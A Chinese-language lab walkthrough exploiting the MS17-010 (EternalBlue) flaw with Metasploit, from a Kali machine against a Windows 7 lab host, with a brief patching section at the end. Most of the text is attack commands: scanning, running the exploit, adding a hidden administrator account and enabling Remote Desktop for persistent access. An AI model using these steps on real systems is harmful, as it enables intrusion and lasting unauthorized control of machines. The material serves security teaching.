实验环境:
kali 192.168.153.135
win7 192.168.153.138
1、终端启动metasploit
sudo msfdb init && msfconsole
2、检测靶机是否存在ms17-010漏洞
(1)查找ms17-010相关模块
search ms17-010
(2)使用ms17-010扫描模块,对靶机Win7进行扫描
使用模块
use auxiliary/scanner/smb/smb_ms17_010
查看需要的配置
show options
设置目标IP
set rhost 192.168.153.138
执行扫描
run
3、漏洞利用
使用渗透模块
use exploit/windows/smb/ms17_010_eternalblue
查看可设置的选项
show options
设置渗透目标ip
set rhost 192.168.153.138
执行渗透
run
通过Shell对靶机Win7进行控制
创建用户名密码
net user cat cat /add
将用户cat添加入管理组
net localgroup administrators cat /add
开启远程桌面功能
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
Kali远程桌面连接Win7
rdesktop 192.168.153.138
成功远程桌面连接
5、漏洞修复
(1)在线更新;开启Windows Update更新。
(2)打补丁。